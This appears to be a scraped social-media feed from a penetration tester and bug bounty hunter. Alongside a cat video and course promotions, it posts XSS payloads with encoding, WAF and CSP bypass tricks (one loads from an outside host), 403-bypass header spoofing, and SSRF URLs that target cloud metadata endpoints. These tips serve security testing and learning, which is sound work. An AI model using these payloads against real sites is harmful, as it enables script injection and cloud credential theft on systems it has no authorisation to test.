Sapienshack
@sapienshack
Lead Application Security Analyst | Penetration Tester | Bug Bounty Hunter | Career Adviser | Security Researcher | Developer | Secure Code Review
cat vs wild 😜 #beargrylls #indiancat #catlover #bagarbilla youtube.com/shorts/TA0drSg… via @YouTube
<!-- alert --> #HTML entities/encode: javascript:alert() javascript:alert`` #url encoding: javascript:alert%60%60 javascript:x='%27-alert(1)-%27'; javascript:%61%6c%65%72%74%28%29 #JS unicode javascript:a\u006Cert``" javascript:\u0061\u006C\u0065\u0072\u0074``
Our Top 5 #XSS Vectors Main + Inline 1')"<!--><Svg OnLoad=(confirm)(1)<!-- Full URL Validation JavaScript://%250Dtop.confirm?.(1)// Weak CSP Bypass 1'"><!--><Base Href=//X55.is? Regular JS Injection 1'-top['con\146irm'](1)-' Quoteless JSi /confirm?.(1)//\ #XSS #GameChanger
To bypass 403 restrictions:
1. Use patterns like these in the URL path: /* /%2f/ /./ / /*/
2. Add headers to the request with the value 127.0.0.1: X-Custom-IP-Authorization, X-Forwarded-For, X-Remote-IP, Forwarded-For, X-Client-IP
3. Switch from GET to POST (or other methods)
#CyberSecurity
You're using Burp Collaborator wrong. Don't use Burp's default collaborator instance when testing for out of band vulnerabilities. Many companies use egress filtering & block outbound traffic to the default collaborator domain oastify.com It's worth setting up a…
Want to learn SSRF? credit : imabhisarpandey (1/5)
Blogs:
- book.hacktricks.xyz/pentesting-web…
- cobalt.io/blog/a-pentest…
- payatu.com/blog/arjuns/a-…
- opensourceagenda.com/projects/allth…
- neuralegion.com/blog/ssrf-serv…
- trustwave.com/en-us/resource…
- 0xn3va.gitbook.io/cheat-sheets/w…
#infosec
If you think these apps are good for #XSS testing... ❌ DVWA ❌ Altoro Mutual ❌ TestPHP VulnWeb ❌ Firing Range Sorry to say but we are in 2024! 😆 They are so old that some of their tests are meant for Internet Explorer 6 to 9! knoxss.me/?page_id=766 Update your #XSS game.
Day 4/7 : SSRF Payload for Technologies:
Oracle
- http://192.0.0.192/latest/
- http://192.0.0.192/latest/user-data/
- http://192.0.0.192/latest/meta-data
- http://192.0.0.192/latest/attributes/
Alibaba
- http://100.100.100.200/latest/meta-data/…
Subdomain Finder Websites | Find Subdomains without installing tools on your machine⚔️
- subdomainfinder.c99.nl
- dnsdumpster.com
- pentest-tools.com/information-ga…
- nmmapper.com/sys/tools/subd…
- securitytrails.com/domain/
- dnsspy.io
- suip.biz…
Top 5 KNOXSS #XSS Vectors Main + Inline 1')"<!--><Svg OnLoad=(confirm)(1)<!-- Full URL Validation JavaScript://%250Dtop.confirm?.(1)// Weak CSP Bypass 1'"><!--><Base Href=//X55.is? Regular JS Injection 1'-top['con\146irm'](1)-' Quoteless JSi /confirm(1)?.(1)//\ #GameChanger
Directory-brute forcing? You should NEVER filter based on status code. Paths can exist and return a 404. I’ve seen this so many times: /noexist/ -> 404 Not Found. /api/ -> 404 Not Found, but different response body (JSON formatted) /api/endpoint -> 200 OK Filter by…
XSS validation bypass when the application blocks parentheses: " ><img onerror=alert`23` src=a> #bugbountytips #bugbountyconference #XSS #Security #waf
An XSS JSON payload to bypass WAF, by @0x0SojalSec ["');alert('XSS');//"]@xyz.xxx
For those who are new to bug bounty or those who haven’t found SSRF yet, you can use these tools to get your first SSRF bug 🎯💰 PS: Don’t completely rely on tools, do manual testing too🧑💻
An unbeatable 75% off for those ready to elevate their skills 🥳! ** Like, Comment, Re-share, and 1 lucky winner will get a 100% discount on our CMPen- Android exam!** 🔖Promo Code - CMPen-Android-75-OFF 🕵️♂️Tom's Static Analysis Adventure! Tom was knee-deep into an Android…
Nuclei scanner's power comes from fuzzing templates. The following repository has different templates for the scanner which can be used for finding unknown security vulnerabilities github.com/projectdiscove… #bugbountytips #bugbounty #CyberSecurity
Pass the eWPTXv2 Exam on Your First Attempt in 2023! { by @grumpzsux } from @hashnode grumpz.net/pass-the-ewptx…